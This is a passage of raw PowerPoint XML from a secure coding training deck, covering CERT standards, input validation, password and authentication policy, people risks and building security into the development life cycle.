          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEI CERT Android Secure Coding Standard—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/display/android/Android+Secure+Coding+Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEI CERT C Coding Standard—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/display/c/SEI+CERT+C+Coding+Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEI CERT C++ Coding Standard—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=637</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEI CERT Perl Coding Standard—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/display/perl/SEI+CERT+Perl+Coding+Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build Security into Your Design Processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BE5B8A1-7C61-4C0A-A264-BC99019B92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555596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849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3DBC0-73C4-4066-8E97-26C73CF01EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6496D163-9416-43B1-9E0B-1E8BD994176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505199" y="2286000"/>
            <a:ext cx="5296875" cy="3937000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify all of the organization's policy requirements that your software must conform to and enforce, before you design your software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify all requirements imposed by the platform and any services your software uses, before you design your software.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6BECB2-FAF0-4225-97F7-FA2E8297BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce Security Policies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1371599"/>
            <a:ext cx="5905806" cy="5493773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CCCFB29-8BA1-4ADB-950F-AF5DF3AF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030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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate input using a centralized input validation function on a trusted system (server, for example).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For web applications, validate all inputs coming from untrusted sources (user, input files, remote databases, parameters, URLs, HTTP header content, data redirects, and active page content such as Flash, AJAX, and so forth) before processing, and ensure they:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are in a specific character set (e.g., UTF-8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contain the expected data types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contain the expected data range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contain the expected data length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contain allowed characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not contain disallowed characters, such as null bytes (%00), line control characters (%0d, %0a, \r, \n), and path modification characters (../ and ..\).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate that header values in HTTP requests and responses contain only ASCII characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reject data sources that do not pass validation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit User Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D88943C4-0916-4761-80B5-1CABE24A0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452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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set requirements that make a password difficult to crack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimum length of 8 characters (12 characters preferred)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complexity of at least three types of characters (upper case, lower case, numbers, special characters)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frequent password changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimum and maximum password age</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password history </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For administrative or other sensitive accounts, consider password alternatives such as: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Biometrics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Smart cards and tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multifactor authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish and Enforce a Strong Authentication Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D88943C4-0916-4761-80B5-1CABE24A0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245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870AFF-0019-40CF-B7C3-5184C642C173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D079A1E-A10C-4BFA-B32A-141E6F95EB80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems due to vulnerabilities in software may be made worse when users purposely or inadvertently fall prey to them or take advantage of them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this activity, you'll explore how human error can make a bad problem worse, and you’ll consider various steps you might take to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Promote secure practices among end users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect users from social engineering attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent information leakage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design the user interface to help protect against human error.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF0928E-844F-47D9-B575-C1D18348C21F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Managing People Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{243AA97F-620C-4791-BCCA-75AB615C1CCE}"/>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6"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758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D45356-621E-43E7-A4C0-474002DC0A7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</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BF91CD71-9C3E-4180-B365-CC2815C5C128}"/>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439B1390-4735-49E2-BA71-43CDA3CBFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handle Vulnerabilities Due to Process Shortcomings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1214273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FEF01E-AF4A-4CB9-A27E-1F92532A8C47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84FF2F80-1852-484F-8C43-135C9ED0F56B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different software development life cycle (SDLC) methodologies have evolved over the years. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are many successful (and some unsuccessful) ways to manage software development projects, each reflecting a different general philosophy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General approaches include the following.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plan-driven methodologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Iterative methodologies, such as Agile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just-in-time methodologies, such as Lean Software Development (LSD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common development tasks are represented in most of the methodologies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maintenance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security should be addressed in each of these tasks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32B2AB0-3DE4-4D77-8994-FA776F95C327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development Process Approaches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="915076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9381E2-5B0C-496A-9669-CFB104023D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Building Security In (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89D8C56F-5ACC-4B5D-BEF2-FB10FA01903E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1307130"/>
            <a:ext cx="7311055" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The process you follow will have some impact on how and when you address security. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Diagramming the flow of data to identify potential points of vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Traditional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> plan-driven process: You might do this task in advance, using documentation tools and publishing the completed data flow diagram so the entire development team can refer to it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Agile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> process: You might have a room whose walls are covered in whiteboards, on which the team draws their data flow diagrams. In this form, the diagrams can be quickly updated as the design evolves.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Regardless of the methodology you follow, you can adapt it to build security into each phase or aspect of development.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If security is built-in, then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You stand a better chance of developing software that is secure to begin with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changes to software later will be less likely to compromise overall security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use standards and models to implement a secure SDLC.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B071E7-3400-4A71-AB48-0B84CCB78359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7669342" y="1419225"/>
            <a:ext cx="1301205" cy="4794738"/>
            <a:chOff x="7662504" y="1447800"/>
            <a:chExt cx="1301205" cy="4794738"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7662504" y="4941333"/>
              <a:ext cx="1301205" cy="1301205"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Arrow: Down 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7988270" y="1447800"/>
              <a:ext cx="649672" cy="3798855"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">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 name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8065926" y="1589281"/>
              <a:ext cx="513410" cy="3334439"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="wordArtVert" wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
